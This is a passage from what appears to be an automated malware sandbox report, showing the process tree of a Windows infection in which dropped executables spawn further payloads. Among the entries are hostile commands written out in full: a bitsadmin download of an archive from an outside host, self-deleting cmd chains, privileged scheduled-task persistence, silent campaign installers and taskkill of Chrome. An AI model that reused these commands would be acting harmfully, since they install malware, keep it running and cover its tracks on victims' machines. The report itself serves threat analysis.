                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\59umdMg8h__BMO943e2jS9v9.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\59umdMg8h__BMO943e2jS9v9.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4800
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\6FDZxJgG1Wt37pjd6ZpLc4Wr.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\6FDZxJgG1Wt37pjd6ZpLc4Wr.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Checks processor information in registry
                                                                                                                            PID:4288
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 6FDZxJgG1Wt37pjd6ZpLc4Wr.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\6FDZxJgG1Wt37pjd6ZpLc4Wr.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                              7⤵
                                                                                                                                PID:4640
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /im 6FDZxJgG1Wt37pjd6ZpLc4Wr.exe /f
                                                                                                                                  8⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:1520
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  timeout /t 6
                                                                                                                                  8⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:5864
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\8dda7npmIcYeXzYt3FV8oHd0.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\8dda7npmIcYeXzYt3FV8oHd0.exe"
                                                                                                                              6⤵
                                                                                                                                PID:4780
                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:2028
                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\inst002.exe
                                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\inst002.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:5712
                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5696
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\X9nW_tE7x04RpzC0lbPbBwQE.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\X9nW_tE7x04RpzC0lbPbBwQE.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:4756
                                                                                                                                    • C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe
                                                                                                                                      "C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Checks computer location settings
                                                                                                                                      PID:4888
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\D_EfTQrJceyD3MfYKKBJEEIx.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\D_EfTQrJceyD3MfYKKBJEEIx.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5252
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\3UxfDYLaojk9LVVckgEf50wj.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\3UxfDYLaojk9LVVckgEf50wj.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:2696
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\3UxfDYLaojk9LVVckgEf50wj.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\3UxfDYLaojk9LVVckgEf50wj.exe"
                                                                                                                                          9⤵
                                                                                                                                            PID:4176
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\wroy4Miybe2ougiWLEOEFWXl.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\wroy4Miybe2ougiWLEOEFWXl.exe"
                                                                                                                                          8⤵
                                                                                                                                            PID:5772
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\oYnP_FqhAzgur4cNB4DPfK92.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\oYnP_FqhAzgur4cNB4DPfK92.exe"
                                                                                                                                            8⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3040
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                              9⤵
                                                                                                                                                PID:5824
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                                                  10⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:6444
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\X_On7zYdQqREPQJbB1Rq1q1g.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\X_On7zYdQqREPQJbB1Rq1q1g.exe"
                                                                                                                                              8⤵
                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                              PID:4448
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\e1J2tsvTjfxuTugs6yv0DlyQ.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\e1J2tsvTjfxuTugs6yv0DlyQ.exe" /mixtwo
                                                                                                                                              8⤵
                                                                                                                                                PID:5132
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "e1J2tsvTjfxuTugs6yv0DlyQ.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\e1J2tsvTjfxuTugs6yv0DlyQ.exe" & exit
                                                                                                                                                  9⤵
                                                                                                                                                    PID:6840
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /im "e1J2tsvTjfxuTugs6yv0DlyQ.exe" /f
                                                                                                                                                      10⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:6916
                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\jUeU7Bu_WT45I7OiFKVJnk0b.exe
                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\jUeU7Bu_WT45I7OiFKVJnk0b.exe"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:4088
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\3471943.scr
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\3471943.scr" /S
                                                                                                                                                      9⤵
                                                                                                                                                        PID:5532
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\6848667.scr
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\6848667.scr" /S
                                                                                                                                                        9⤵
                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                        PID:3636
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\2809044.scr
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\2809044.scr" /S
                                                                                                                                                        9⤵
                                                                                                                                                          PID:4624
                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\PfVqpSsKUQW4xoL9vn0NvUH9.exe
                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\PfVqpSsKUQW4xoL9vn0NvUH9.exe"
                                                                                                                                                        8⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        PID:4780
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-E9ALC.tmp\PfVqpSsKUQW4xoL9vn0NvUH9.tmp
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-E9ALC.tmp\PfVqpSsKUQW4xoL9vn0NvUH9.tmp" /SL5="$70328,506127,422400,C:\Users\Admin\Pictures\Adobe Films\PfVqpSsKUQW4xoL9vn0NvUH9.exe"
                                                                                                                                                          9⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:5396
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-3FVIP.tmp\Adam.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-3FVIP.tmp\Adam.exe" /S /UID=2709
                                                                                                                                                            10⤵
                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            PID:6748
                                                                                                                                                            • C:\Program Files\Windows NT\PNYYZRELDC\foldershare.exe
                                                                                                                                                              "C:\Program Files\Windows NT\PNYYZRELDC\foldershare.exe" /VERYSILENT
                                                                                                                                                              11⤵
                                                                                                                                                                PID:936
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\f6-954da-d37-2a1ad-43f4cf85dc6e6\Wijijesiri.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\f6-954da-d37-2a1ad-43f4cf85dc6e6\Wijijesiri.exe"
                                                                                                                                                                11⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                PID:6256
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\d7-54fe8-3e4-392ad-e986a2bb31b6d\Ponaleduri.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\d7-54fe8-3e4-392ad-e986a2bb31b6d\Ponaleduri.exe"
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:6012
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\srbhbn0l.cuz\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet & exit
                                                                                                                                                                    12⤵
                                                                                                                                                                      PID:11256
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\srbhbn0l.cuz\Calculator%20Installation.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\srbhbn0l.cuz\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet
                                                                                                                                                                        13⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                        PID:12280
                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Calculator\Calculator 1.0.0\install\FD7DF1F\Calculator Installation.msi" SID=764 CID=764 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\srbhbn0l.cuz\Calculator%20Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\srbhbn0l.cuz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633394215 SID=764 CID=764 SILENT=1 /quiet " SID="764" CID="764"
                                                                                                                                                                          14⤵
                                                                                                                                                                            PID:9112
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\os2two1p.p14\GcleanerEU.exe /eufive & exit
                                                                                                                                                                        12⤵
                                                                                                                                                                          PID:11560
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\os2two1p.p14\GcleanerEU.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\os2two1p.p14\GcleanerEU.exe /eufive
                                                                                                                                                                            13⤵
                                                                                                                                                                              PID:12260
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\os2two1p.p14\GcleanerEU.exe" & exit
                                                                                                                                                                                14⤵
                                                                                                                                                                                  PID:8280
                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                    taskkill /im "GcleanerEU.exe" /f
                                                                                                                                                                                    15⤵
                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                    PID:8596
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ffddhqxr.av1\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:5708
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ffddhqxr.av1\installer.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\ffddhqxr.av1\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                  13⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  PID:11884
                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ffddhqxr.av1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ffddhqxr.av1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633394215 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                    14⤵
                                                                                                                                                                                      PID:660
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bgdpleib.dg4\any.exe & exit
                                                                                                                                                                                  12⤵
                                                                                                                                                                                    PID:11672
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bgdpleib.dg4\any.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bgdpleib.dg4\any.exe
                                                                                                                                                                                      13⤵
                                                                                                                                                                                        PID:12108
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x5n04gyo.gom\cust2.exe & exit
                                                                                                                                                                                      12⤵
                                                                                                                                                                                        PID:11904
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\x5n04gyo.gom\cust2.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\x5n04gyo.gom\cust2.exe
                                                                                                                                                                                          13⤵
                                                                                                                                                                                            PID:7084
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ptrqvghr.dhw\gcleaner.exe /mixfive & exit
                                                                                                                                                                                          12⤵
                                                                                                                                                                                            PID:6200
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ptrqvghr.dhw\gcleaner.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ptrqvghr.dhw\gcleaner.exe /mixfive
                                                                                                                                                                                              13⤵
                                                                                                                                                                                                PID:5420
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ptrqvghr.dhw\gcleaner.exe" & exit
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                    PID:8956
                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                      taskkill /im "gcleaner.exe" /f
                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                      PID:9252
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nme3of22.slh\autosubplayer.exe /S & exit
                                                                                                                                                                                                12⤵
                                                                                                                                                                                                  PID:6504
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\nme3of22.slh\autosubplayer.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\nme3of22.slh\autosubplayer.exe /S
                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                    PID:7156
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv8229.tmp\tempfile.ps1"
                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                        PID:4568
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv8229.tmp\tempfile.ps1"
                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                          PID:10380
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv8229.tmp\tempfile.ps1"
                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                            PID:10964
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv8229.tmp\tempfile.ps1"
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                              PID:4788
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv8229.tmp\tempfile.ps1"
                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                PID:11352
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv8229.tmp\tempfile.ps1"
                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                  PID:2204
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv8229.tmp\tempfile.ps1"
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                  • Checks for any installed AV software in registry
                                                                                                                                                                                                                  PID:5828
                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                  "bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                                                                                  PID:7212
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kvs0ikr2.sic\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                PID:4484
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\kvs0ikr2.sic\installer.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\kvs0ikr2.sic\installer.exe /qn CAMPAIGN=654
                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                    PID:3832
                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\fF2OrC83FoF1r28MadbSbhIW.exe
                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\fF2OrC83FoF1r28MadbSbhIW.exe" silent
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                          PID:4328
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:4124
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:1800
                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\pLGBE6WwhRv8UlJkbTvD7f0Z.exe
                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\pLGBE6WwhRv8UlJkbTvD7f0Z.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      PID:5344
                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\F6UKj67aIvVdwaonW9tESwL9.exe
                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\F6UKj67aIvVdwaonW9tESwL9.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:5476
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 248
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5404
                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\0rH5QJq4xOCxOcU16VOLr17N.exe
                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\0rH5QJq4xOCxOcU16VOLr17N.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:5216
                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\yayRCeNK80mxcPfEw18QESlE.exe
                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\yayRCeNK80mxcPfEw18QESlE.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                        PID:4996
                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\9_6NhMXY6F_Xe3fBf7n0EVF9.exe
                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\9_6NhMXY6F_Xe3fBf7n0EVF9.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        PID:6028
                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\9_6NhMXY6F_Xe3fBf7n0EVF9.exe
                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\9_6NhMXY6F_Xe3fBf7n0EVF9.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:3892
                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\f7oh1UqdEPlmOvQsYqa2UlFn.exe
                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\f7oh1UqdEPlmOvQsYqa2UlFn.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:3608
                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\EMY_3R8_Ub3ZSoBQu1dKu9AD.exe
                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\EMY_3R8_Ub3ZSoBQu1dKu9AD.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:4556
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 844
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:4284
                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\SaxrARBayaKZhwwuwW0WCt5w.exe
                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\SaxrARBayaKZhwwuwW0WCt5w.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                        PID:5068
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                    PID:1688
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu16205451b994.exe
                                                                                                                                                                                                      Thu16205451b994.exe /mixone
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:1752
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 656
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:4568
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 672
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5464
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 628
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5640
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 720
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5744
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 888
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5240
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 936
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:1172
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 1140
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5500
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 1228
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:5712
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu161580bf75.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                    PID:1980
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS452F6EB4\Thu161580bf75.exe
                                                                                                                                                                                                      Thu161580bf75.exe
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
